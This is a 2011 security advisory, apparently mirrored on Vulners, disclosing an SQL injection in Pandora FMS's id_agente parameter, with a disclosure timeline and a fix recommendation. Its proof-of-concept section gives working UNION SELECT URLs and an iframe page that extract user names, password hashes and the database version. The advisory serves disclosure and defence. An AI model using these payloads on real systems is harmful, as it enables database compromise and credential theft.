Vulners
Lucene search
Pandora FMS (id_agent) - SQL Injection Vulnerability
🗓️ 17 Jul 2011 00:00:00Reported by Vulnerability Research LaboratoryType 
vulnerlab🔗 www.vulnerability-lab.com👁 16 Views
Document Title:
===============
Pandora FMS (id_agent) - SQL Injection Vulnerability
References (Source):
====================
OSVDB-ID: 61222 (http://osvdb.org/show/osvdb/61222)
EDB-ID: 10570 (http://www.exploit-db.com/exploits/10570/)
PID: 84127 (http://packetstormsecurity.org/files/view/84127/pandorafms-sql.txt)
Release Date:
=============
2011-07-17
Vulnerability Laboratory ID (VL-ID):
====================================
176
Product & Service Introduction:
===============================
Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to
know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement
in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ
new technology market.
* Detect new systems in network.
* Checks for availability or performance.
* Raise alerts when something goes wrong.
* Allow to get data inside systems with its own lite agents (for almost every Operating System).
* Allow to get data from outside, using only network probes. Including SNMP.
* Get SNMP Traps from generic network devices.
* Generate real time reports and graphics.
* SLA reporting.
* User defined graphical views.
* Store data for months, ready to be used on reporting.
* Real time graphs for every module.
* High availability for each component.
* Scalable and modular architecture.
* Supports up to 2500 modules per server.
* User defined alerts. Also could be used to react on incidents.
* Integrated incident manager.
* Integrated DB management: purge and DB compaction.
* Multiuser, multi profile, multi group.
* Event system with user validation for operation in teams.
* Granularity of accesses and user profiles for each group and each user.
* Profiles could be personalized using up to eight security attributes without limitation on groups or profiles.
Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.
Demo: http://artica.homelinux.com/pandora/index.php (demo:demo)
(Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)
Abstract Advisory Information:
==============================
The Vulnerability-Lab Team discovered a SQL Injection Vulnerability on Pandora FMS Monitoring Software.
Attackers can manipulate the application DBMS via remote sql-injection vulnerability.
Vulnerability Disclosure Timeline:
==================================
2009-11-28: Vendor Notification
2009-12-03: Vendor Response/Feedback
2009-12-13: Vendor Fix/Patch
2009-12-20: Public or Non-Public Disclosure
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
Attackers can execute SQL statements over the a not secured statement.
Vulnerable Modules:
[+] Pandora Agents > Agent General information
Path: /pandora/
File: index.php
Para: ?sec=estado&sec2=operation/agentes/ver_agente&id_agente=
[+] Pictures
http://img138.imageshack.us/img138/6229/sql1.png
http://img138.imageshack.us/img138/9047/sql2.png
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers ...
<html><head><body>
<title>Pandora FMS Monitoring Application - v2.1.x & v3.x - SQL Injection Exploit</title>
<br><br>
<b>HASH</b>
<iframe src=http://127.0.0.1:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=1%20union%20select%201,concat_ws%280x3a,id_usuario,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20FROM%20tusuario%20order%20by%202 width=500 height=500>
<br><br>
<b>VERSION</b>
<iframe src=http://127.0.0.1:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=1%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20order%20by%202 width=500 height=500>
</body></head></html>
References:
http://127.0.0.1:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=1%20union%20select%201,concat_ws%280x3a,id_usuario,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20FROM%20tusuario%20order%20by%202
http://127.0.0.1:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=1%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20order%20by%202
Solution - Fix & Patch:
=======================
Use the prepared statement class to fix the sql vulnerability on the pandora monitoring software/application.
Security Risk:
==============
Attacks can compromise the application (DBMS) via remote sql-injection.
The security risk of the remote sql injection vulnerability is estimated as critical.
Credits & Authors:
==================
Vulnerability Research Laboratory
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.
Copyright © 2012 | Vulnerability Laboratory
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jul 2011 00:00Current
0.4Low risk
Vulners AI Score0.4